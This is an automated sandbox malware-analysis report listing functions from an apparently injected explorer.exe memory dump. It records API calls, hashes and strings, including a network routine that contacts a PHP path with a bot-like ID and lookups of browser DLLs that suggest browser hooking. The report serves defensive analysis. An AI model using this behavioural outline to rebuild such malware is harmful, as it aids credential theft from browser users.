Instruction Fuzzy Hash: A5A022C2820B00C2E282000A0B883E20F828F23BBAE0C032C0C38C22E00B2B28030008

Function 09850378 Relevance: .0, Instructions: 1COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
Instruction Fuzzy Hash:

Function 0983A420 Relevance: 49.9, APIs: 33, Instructions: 363stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0983A0E0: EnterCriticalSection.KERNEL32 ref: 0983A0F4
Part of subcall function 0983A0E0: LeaveCriticalSection.KERNEL32 ref: 0983A11D

wsprintfA.USER32 ref: 0983A4B4
lstrlenA.KERNEL32 ref: 0983A501
memcpy.MSVCRT ref: 0983A51B
memcpy.MSVCRT ref: 0983A733
free.MSVCRT ref: 0983A73E
free.MSVCRT ref: 0983A752
StrStrA.SHLWAPI ref: 0983A762
StrStrA.SHLWAPI ref: 0983A791
StrToIntA.SHLWAPI ref: 0983A7C8
free.MSVCRT ref: 0983A7DD
malloc.MSVCRT ref: 0983A802
memcpy.MSVCRT ref: 0983A818
malloc.MSVCRT ref: 0983A840
realloc.MSVCRT ref: 0983A84E
malloc.MSVCRT ref: 0983A88B
realloc.MSVCRT ref: 0983A899
memcpy.MSVCRT ref: 0983A8AE
lstrlenA.KERNEL32 ref: 0983A8D5
memcpy.MSVCRT ref: 0983A8E8
malloc.MSVCRT ref: 0983A923
realloc.MSVCRT ref: 0983A931
memcpy.MSVCRT ref: 0983A946
memcpy.MSVCRT ref: 0983A86D

Part of subcall function 0983A250: malloc.MSVCRT ref: 0983A2F3
Part of subcall function 0983A250: realloc.MSVCRT ref: 0983A301
Part of subcall function 0983A250: memcpy.MSVCRT ref: 0983A319

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
String ID:
API String ID: 812771569-0
Opcode ID: 63243f6790e5d17214911157205b1940921de3069c4743449ec7b7d160343d5d
Instruction ID: 40a2252da6ba4dbc485446185b39673b7e6cde80cb8786200697a6e55204e211
Opcode Fuzzy Hash: 63243f6790e5d17214911157205b1940921de3069c4743449ec7b7d160343d5d
Instruction Fuzzy Hash: 33E17B71205B0487DB28DF6AE89432AB3A1F745B84F84D129DB8B8BB16DF7DD445CB80

Function 0983A240 Relevance: 27.2, APIs: 18, Instructions: 171stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0983AC06
strncmp.MSVCRT ref: 0983AC1C
strncmp.MSVCRT ref: 0983AC3A
malloc.MSVCRT ref: 0983AC67
memcpy.MSVCRT ref: 0983AC80

Part of subcall function 09835720: StrStrIA.SHLWAPI ref: 09835735

StrStrA.SHLWAPI ref: 0983ACB7
StrToIntA.SHLWAPI ref: 0983ACDD
free.MSVCRT ref: 0983ACF0
realloc.MSVCRT ref: 0983AD0D
memcpy.MSVCRT ref: 0983AD28
LeaveCriticalSection.KERNEL32 ref: 0983AD5E
malloc.MSVCRT ref: 0983AD92
memcpy.MSVCRT ref: 0983ADA5
lstrlenA.KERNEL32 ref: 0983AE08
free.MSVCRT ref: 0983AE33
free.MSVCRT ref: 0983AE3C
free.MSVCRT ref: 0983AE6B
LeaveCriticalSection.KERNEL32 ref: 0983AE78

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
String ID:
API String ID: 4124047334-0
Opcode ID: 896a6772e18e2a38bb0a991d206c4a7a753a7270d8fb3338d4fd2d51914a43c6
Instruction ID: 6135e5dc1e2338399560460706fa4511c0dcc5c205788204a4af9b80a25fe1f6
Opcode Fuzzy Hash: 896a6772e18e2a38bb0a991d206c4a7a753a7270d8fb3338d4fd2d51914a43c6
Instruction Fuzzy Hash: 04714A64646B00C6EB089F66EC5432A77A1BB86FD1F84D12ADD8E8B766DF3CC045C780

Function 09829450 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 107stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 09829498
RtlInitializeCriticalSection.NTDLL ref: 098294A5
lstrcpyA.KERNEL32 ref: 098294DA

Part of subcall function 0982EF20: GetWindowsDirectoryA.KERNEL32 ref: 0982EF6C
Part of subcall function 0982EF20: GetVolumeInformationA.KERNEL32 ref: 0982EFB6
Part of subcall function 0982EF20: wsprintfA.USER32 ref: 0982F017

lstrcpyA.KERNEL32 ref: 098294FD
lstrcatA.KERNEL32 ref: 0982950D
LeaveCriticalSection.KERNEL32 ref: 098295A4

Part of subcall function 098272C0: send.WS2_32 ref: 098274EC
Part of subcall function 098272C0: recv.WS2_32 ref: 09827553
Part of subcall function 098272C0: lstrcmpiA.KERNEL32 ref: 098275B3
Part of subcall function 098272C0: lstrlenA.KERNEL32 ref: 098275D7
Part of subcall function 098272C0: StrStrA.SHLWAPI ref: 098275EF
Part of subcall function 098272C0: lstrcmpiA.KERNEL32 ref: 0982760E
Part of subcall function 098272C0: strtol.MSVCRT ref: 09827626

lstrcatA.KERNEL32 ref: 0982951D

Part of subcall function 098272C0: lstrcpyA.KERNEL32 ref: 0982731E
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982732F
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827343
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827357
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827368
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982737C
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982739A
Part of subcall function 098272C0: wsprintfA.USER32 ref: 098273B2
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 098273C6
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 098273DA
Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827416
Part of subcall function 098272C0: WSAStartup.WS2_32 ref: 09827426
Part of subcall function 098272C0: socket.WS2_32 ref: 09827442
Part of subcall function 098272C0: gethostbyname.WS2_32 ref: 09827459
Part of subcall function 098272C0: memcpy.MSVCRT ref: 09827479
Part of subcall function 098272C0: htons.WS2_32 ref: 09827488
Part of subcall function 098272C0: connect.WS2_32 ref: 0982749F
Part of subcall function 098272C0: lstrlenA.KERNEL32 ref: 098274B5
Part of subcall function 098272C0: send.WS2_32 ref: 098274CB

memcpy.MSVCRT ref: 098295BC
lstrlenA.KERNEL32 ref: 098295CA

Strings

/VzCAHn.php?1DC30FADAFF92643095942, xrefs: 098294F3
1DC30FADAFF92643095942, xrefs: 098294E0, 09829513

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$CriticalSectionlstrcpylstrlen$lstrcmpimemcpysendwsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
String ID: /VzCAHn.php?1DC30FADAFF92643095942$1DC30FADAFF92643095942
API String ID: 3667244998-2251421373
Opcode ID: e8196019e5aa11d87cfdbe6b91fda0ce18f79f5cd424b38d00914106e7803aab
Instruction ID: b2e7569f96a858c1f987c0bf88db1d24eee7b8d8218b6e72c63d4b2feda720df
Opcode Fuzzy Hash: e8196019e5aa11d87cfdbe6b91fda0ce18f79f5cd424b38d00914106e7803aab
Instruction Fuzzy Hash: 25516A35209B8185EB50DF25F95835A73A5F79AB84F40801ADA8ECBB36DF3DC189CB40

Function 09840E20 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 09840E31
free.LIBCMT ref: 09840E4E

Part of subcall function 0983D6CC: HeapFree.KERNEL32 ref: 0983D6E2
Part of subcall function 0983D6CC: _errno.LIBCMT ref: 0983D6EC
Part of subcall function 0983D6CC: GetLastError.KERNEL32 ref: 0983D6F4

free.LIBCMT ref: 09840E63
free.LIBCMT ref: 09840E84
free.LIBCMT ref: 09840E99
free.LIBCMT ref: 09840EAD
free.LIBCMT ref: 09840EB9
free.LIBCMT ref: 09840ED7
EncodePointer.KERNEL32 ref: 09840EDE
free.LIBCMT ref: 09840EF7
free.LIBCMT ref: 09840F10
free.LIBCMT ref: 09840F3C

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
String ID:
API String ID: 4099253644-0
Opcode ID: f28695c1721cc922f6cd581513c1ebbdbf0f108c64f7b85277b68bf9fb14047b
Instruction ID: 8df371ddf2e7a5d717d06d68ae0ea93815e7f7f3c19389edbbe1b2ae50dc3fa7
Opcode Fuzzy Hash: f28695c1721cc922f6cd581513c1ebbdbf0f108c64f7b85277b68bf9fb14047b
Instruction Fuzzy Hash: 56314B61211B0981EF159F15ED503752360AF6AF94F89E62DEA2D8B3E2EF3DC0598381

Function 098398C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 150COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0983A1C0: RtlInitializeCriticalSection.NTDLL ref: 0983A1F1
Part of subcall function 0983A1C0: RtlInitializeCriticalSection.NTDLL ref: 0983A1FE

GetModuleHandleA.KERNEL32 ref: 09839960
GetModuleFileNameA.KERNEL32 ref: 0983997A
malloc.MSVCRT ref: 0983999F
CloseHandle.KERNEL32 ref: 098399FA
free.MSVCRT ref: 09839A03

Strings

opera-browser.dll, xrefs: 09839922
browser.dll, xrefs: 09839919
chrome.dll, xrefs: 09839934
.text, xrefs: 09839A13
msedge.dll, xrefs: 0983992B

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
API String ID: 308684148-2401417439
Opcode ID: 52db66b71d942326f6a3057831e2c129c17e66db914c7c367b284b4bf96511bd
Instruction ID: ab506604ba744829ca097a8c4ba0ea1345032d62ae5388c1828d44b9d3344558
Opcode Fuzzy Hash: 52db66b71d942326f6a3057831e2c129c17e66db914c7c367b284b4bf96511bd
Instruction Fuzzy Hash: EA518C21318B95C5EE24EF12E8503AA63A5F78AB84FC9C019DE89C7715DF7DC209C780

Function 09835A70 Relevance: 17.6, APIs: 14, Instructions: 137stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 09835AEB
lstrlenA.KERNEL32 ref: 09835AF4
lstrlenA.KERNEL32 ref: 09835B00
lstrlenA.KERNEL32 ref: 09835B0F

Part of subcall function 09835FE0: lstrlenA.KERNEL32 ref: 0983600D

malloc.MSVCRT ref: 09835B3D
memset.MSVCRT ref: 09835B96
memcpy.MSVCRT ref: 09835BBE
memcpy.MSVCRT ref: 09835BE8
memcpy.MSVCRT ref: 09835C04
memcpy.MSVCRT ref: 09835C1D
memcpy.MSVCRT ref: 09835C45
memcpy.MSVCRT ref: 09835C74
free.MSVCRT ref: 09835C7D

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy$lstrlen$freemallocmemsetwsprintf
String ID:
API String ID: 1433255627-0
Opcode ID: 85e76e6a571f6c8e61190c0687f8b1d9bdaca75097ac935c84f9baef343490e8
Instruction ID: a2ee10f5d14ec19b1a0fc5f230e3e0271957b326ea098b597f9b7dfb8e454f5f
Opcode Fuzzy Hash: 85e76e6a571f6c8e61190c0687f8b1d9bdaca75097ac935c84f9baef343490e8
Instruction Fuzzy Hash: 98518C76305B8086EB24DF26E85435A73A1FB8AFC4F449029DE4E8BB19DF3DC5458B44

Function 03342360 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc_crt.LIBCMT ref: 03342389

Part of subcall function 0333F5E8: malloc.LIBCMT ref: 0333F613

free.LIBCMT ref: 0334248A
free.LIBCMT ref: 033424A6

Strings

ESE, xrefs: 033423CF, 033423F1, 03342542
ESA, xrefs: 03342460

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: free$_malloc_crtmalloc
String ID: ESA$ESE
API String ID: 2027218043-2868331210
Opcode ID: bbe10e8078358fe23508d738b7d6484acbae767f3e45565ef4f7afcba5aa96c2
Instruction ID: e3a93fe2910682ab1a0e3e51a25975f4ea77627519bf6a471c36c640dcb9bb67
Opcode Fuzzy Hash: bbe10e8078358fe23508d738b7d6484acbae767f3e45565ef4f7afcba5aa96c2
Instruction Fuzzy Hash: CC51A236701B4093EB21DF16F9D031A73A4F788B98F484925AF5D97B10EF38E5A68744

Function 09824840 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 09824A00: isdigit.MSVCRT ref: 09824A27

tolower.MSVCRT ref: 098248B8

Part of subcall function 098246A0: malloc.MSVCRT ref: 098246B0
Part of subcall function 098246A0: free.MSVCRT ref: 098246D0

memcpy.MSVCRT ref: 09824939
_errno.MSVCRT ref: 0982493F
strtod.MSVCRT ref: 0982495D
_errno.MSVCRT ref: 098249BA

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: _errno$freeisdigitmallocmemcpystrtodtolower
String ID:
API String ID: 3554981057-0
Opcode ID: 84ba2e8ffa8c070f8bcb12fe5a57611d4ad0a367bfcb76aaba1e21ae4451d5bc
Instruction ID: 53cea244c1db899102f84333f57218a380082e7dee324dbefe972106afa5484f
Opcode Fuzzy Hash: 84ba2e8ffa8c070f8bcb12fe5a57611d4ad0a367bfcb76aaba1e21ae4451d5bc
Instruction Fuzzy Hash: 8241AF72608B64C6EB21DF32E84472A7AA1F745BC4F41801AEE8687765EF7DC0C5CB50

Function 03340220 Relevance: 12.6, APIs: 10, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 0334024E

Part of subcall function 0333CACC: _errno.LIBCMT ref: 0333CAEC

free.LIBCMT ref: 03340263
free.LIBCMT ref: 03340284
free.LIBCMT ref: 03340299
free.LIBCMT ref: 033402AD
free.LIBCMT ref: 033402B9
free.LIBCMT ref: 033402D7
free.LIBCMT ref: 033402F7
free.LIBCMT ref: 03340310
free.LIBCMT ref: 0334033C

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: 3b725809f783826f38bf764d86fb1a527edf3763737b9a1c545297cb61edb90e
Instruction ID: f78919158bbadd0c3aee4eb47c73bc6261297b6b8b6bc5e0f9b18284ff33ab13
Opcode Fuzzy Hash: 3b725809f783826f38bf764d86fb1a527edf3763737b9a1c545297cb61edb90e
Instruction Fuzzy Hash: 04315E26711B0596FF1ADB55ECE136473A8EB8DB94F0CA621DD194E6A0DF3CC7448305

Function 09844457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__DestructExceptionObject.LIBCMT ref: 09844482
RaiseException.KERNEL32 ref: 098444AB
__DestructExceptionObject.LIBCMT ref: 0984450C
_getptd.LIBCMT ref: 0984445F

Part of subcall function 098423AC: _getptd_noexit.LIBCMT ref: 098423B2
Part of subcall function 098423AC: _amsg_exit.LIBCMT ref: 098423C2

_getptd.LIBCMT ref: 09844511
_getptd.LIBCMT ref: 0984451D

Strings

csm, xrefs: 098444DF

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
String ID: csm
API String ID: 1037122555-1018135373
Opcode ID: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
Instruction ID: c58514a6e781bccea52f086967799421bca5cb83730a704eabe933ca95d09274
Opcode Fuzzy Hash: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
Instruction Fuzzy Hash: 7F21517620478887DB30DF25E44035E77A0FB89BA5F05822ADF9A47BA4CB38D486CB41

Function 0333C948 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0333C965
_errno.LIBCMT ref: 0333C95A

Part of subcall function 0333E8B0: _getptd_noexit.LIBCMT ref: 0333E8B4

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0333C9AD
_errno.LIBCMT ref: 0333C9BC
_invalid_parameter_noinfo.LIBCMT ref: 0333C9C7

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
String ID:
API String ID: 781512312-0
Opcode ID: b6d58ceee801837aff8f69e59bdd2d4c32ffc9275c2499d09e72a805d279f6be
Instruction ID: 3993abfc22c268780d4f414510ce71a5a0c4a0c3740941c655c6ef0b17419ff6
Opcode Fuzzy Hash: b6d58ceee801837aff8f69e59bdd2d4c32ffc9275c2499d09e72a805d279f6be
Instruction Fuzzy Hash: 0A21FC62F083C182DF25D76198D433EA290F746BD0F59D321EBA92FB94CA6CC5418B00

Function 0983D548 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0983D565
_errno.LIBCMT ref: 0983D55A

Part of subcall function 0983F4B0: _getptd_noexit.LIBCMT ref: 0983F4B4

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0983D5AD
_errno.LIBCMT ref: 0983D5BC
_invalid_parameter_noinfo.LIBCMT ref: 0983D5C7

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
String ID:
API String ID: 781512312-0
Opcode ID: 2adfcd022b29f4b069232f6deb85f175021a57b4f4bffe649ae13fab967bf34b
Instruction ID: 481f3e92caf5d4017f6ea10c511f1834830661b72f4ce3b3f2272c871e73cf6c
Opcode Fuzzy Hash: 2adfcd022b29f4b069232f6deb85f175021a57b4f4bffe649ae13fab967bf34b
Instruction Fuzzy Hash: DD212F627043C482DF105B69958432E52D0B7547D8FD4D62DFBAACBFD8DE6CC5418B81

Function 09835CE0 Relevance: 12.1, APIs: 8, Instructions: 57stringthreadCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 09835D14
lstrlenA.KERNEL32 ref: 09835D2A
lstrlenA.KERNEL32 ref: 09835D35
lstrlenA.KERNEL32 ref: 09835D40
malloc.MSVCRT ref: 09835D4E
wsprintfA.USER32 ref: 09835D70
lstrcatA.KERNEL32 ref: 09835D7C
CreateThread.KERNEL32 ref: 09835D9B

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
String ID:
API String ID: 2370468470-0
Opcode ID: a9b2bc6439203cc7de76eeccd1541f13a5137cb49eb13da4fc8e40e5f86a03cf
Instruction ID: 5de9e0158d952c6f7fed4c649d3353ddd6834d5b33e11f3928863ad1d4afb097
Opcode Fuzzy Hash: a9b2bc6439203cc7de76eeccd1541f13a5137cb49eb13da4fc8e40e5f86a03cf
Instruction Fuzzy Hash: 4B119321714B4086DB549F63BC4432AB3A5FB8AFD0F489039EE8A8BB15DF7CC1408B44

Function 09835910 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON

Download Yara Rule

APIs

Part of subcall function 09835FE0: lstrlenA.KERNEL32 ref: 0983600D

lstrlenA.KERNEL32 ref: 0983596C
lstrlenA.KERNEL32 ref: 0983597E
malloc.MSVCRT ref: 0983598F

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$malloc
String ID:
API String ID: 3301496367-0
Opcode ID: b70de2df8b5ea13def80164eecd6f5795553ba9fb1e5a8158d6ae8a0e833ed02
Instruction ID: 0e9d7178a63ccf1cc97a87e12a3e5546bb4fd0e93fc58551a7e361046b8af601
Opcode Fuzzy Hash: b70de2df8b5ea13def80164eecd6f5795553ba9fb1e5a8158d6ae8a0e833ed02
Instruction Fuzzy Hash: 99316B36714B8086DA10CF66E84475AB7A5F789BC4F849029EF8E87B19DF3DC085CB40

Function 09842F60 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc_crt.LIBCMT ref: 09842F89

Part of subcall function 098401E8: malloc.LIBCMT ref: 09840213
Part of subcall function 098401E8: Sleep.KERNEL32 ref: 09840226

free.LIBCMT ref: 0984308A
free.LIBCMT ref: 098430A6

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: free$Sleep_malloc_crtmalloc
String ID:
API String ID: 2523592665-0
Opcode ID: 6ddb8c0c28131733b13b743a7376c5917c7c593878d1fa8564931c1e7f0c3d7d
Instruction ID: 71ddf33810de249bd623d7834c6fea906ca78d90789bac6c0165ebc1a3040aeb
Opcode Fuzzy Hash: 6ddb8c0c28131733b13b743a7376c5917c7c593878d1fa8564931c1e7f0c3d7d
Instruction Fuzzy Hash: 8851B532305B0893DB24DF1AEA5035A7364FB98B98F45852AEF5D87B24EF38C0668744

Function 0334ADA0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0334ADCB
_errno.LIBCMT ref: 0334ADC0

Part of subcall function 0333E8B0: _getptd_noexit.LIBCMT ref: 0333E8B4

_errno.LIBCMT ref: 0334AE6E
_invalid_parameter_noinfo.LIBCMT ref: 0334AE79

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
String ID:
API String ID: 1573762532-0
Opcode ID: 7b0bc5d5922d1f0b486ee26f59a6a1fc4df732259cf4d008f6642b23cd42d3f4
Instruction ID: e115ec89fdacd116f97036f69e64e793f3c508b14c2b74eb8aba89698be94bc8
Opcode Fuzzy Hash: 7b0bc5d5922d1f0b486ee26f59a6a1fc4df732259cf4d008f6642b23cd42d3f4
Instruction Fuzzy Hash: C74125B6E5039582DF24DB1199C02BAB3E4FB40BD5FCC4216EFA45BA94D738E191C340

Function 0984B9A0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0984B9CB
_errno.LIBCMT ref: 0984B9C0

Part of subcall function 0983F4B0: _getptd_noexit.LIBCMT ref: 0983F4B4

_errno.LIBCMT ref: 0984BA6E
_invalid_parameter_noinfo.LIBCMT ref: 0984BA79

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
String ID:
API String ID: 1573762532-0
Opcode ID: 1a03224bb8ec9250c7319079b46cbc1d11abc68a3d1d091dd8c51d37480d4c9a
Instruction ID: 4abbd5425a9b6294a1b47c59fbc23f45ee968f6161bd2cd86e3f782db39aa35a
Opcode Fuzzy Hash: 1a03224bb8ec9250c7319079b46cbc1d11abc68a3d1d091dd8c51d37480d4c9a
Instruction Fuzzy Hash: BF41D072A1139D82DF249F2695406BE7260FF60BD5F88912EFBD597B88E73CC1918340

Function 03346AF8 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 03346B1E
_errno.LIBCMT ref: 03346B13

Part of subcall function 0333E8B0: _getptd_noexit.LIBCMT ref: 0333E8B4

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03346B9D
_errno.LIBCMT ref: 03346BAE
_invalid_parameter_noinfo.LIBCMT ref: 03346BB9

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
String ID:
API String ID: 781512312-0
Opcode ID: 45ae6b8eb7bddcd1aaf1248ec0fc3f7063edf7fb5169375d5b57e009c998ba17
Instruction ID: ac2e87acdc3824722fd93049b82ba6eefb57decdb9165a8e5357b096173c11f0
Opcode Fuzzy Hash: 45ae6b8eb7bddcd1aaf1248ec0fc3f7063edf7fb5169375d5b57e009c998ba17
Instruction Fuzzy Hash: F8313B76A043A182DF24DF1798D12BD73E0E741BE5B8C812ADBD50BB84E728E551C700

Function 098476F8 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0984771E
_errno.LIBCMT ref: 09847713

Part of subcall function 0983F4B0: _getptd_noexit.LIBCMT ref: 0983F4B4

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0984779D
_errno.LIBCMT ref: 098477AE
_invalid_parameter_noinfo.LIBCMT ref: 098477B9

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
String ID:
API String ID: 781512312-0
Opcode ID: dbc648b1f4bc8b06f77f9a657a40850ba1d35854beab1e5c2e07f06a5c1227d0
Instruction ID: fd9b74cef1de93d25d122af808eac1c3748bea45573b361e12ccb4cc1bffb0d2
Opcode Fuzzy Hash: dbc648b1f4bc8b06f77f9a657a40850ba1d35854beab1e5c2e07f06a5c1227d0
Instruction Fuzzy Hash: 28312B72A042A982DF249F1A95502BD73E0FF60BE5BD4812EFBD687B84DB2CC561C740

Function 03343857 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__DestructExceptionObject.LIBCMT ref: 03343882
__DestructExceptionObject.LIBCMT ref: 0334390C
_getptd.LIBCMT ref: 0334385F

Part of subcall function 033417AC: _getptd_noexit.LIBCMT ref: 033417B2
Part of subcall function 033417AC: _amsg_exit.LIBCMT ref: 033417C2

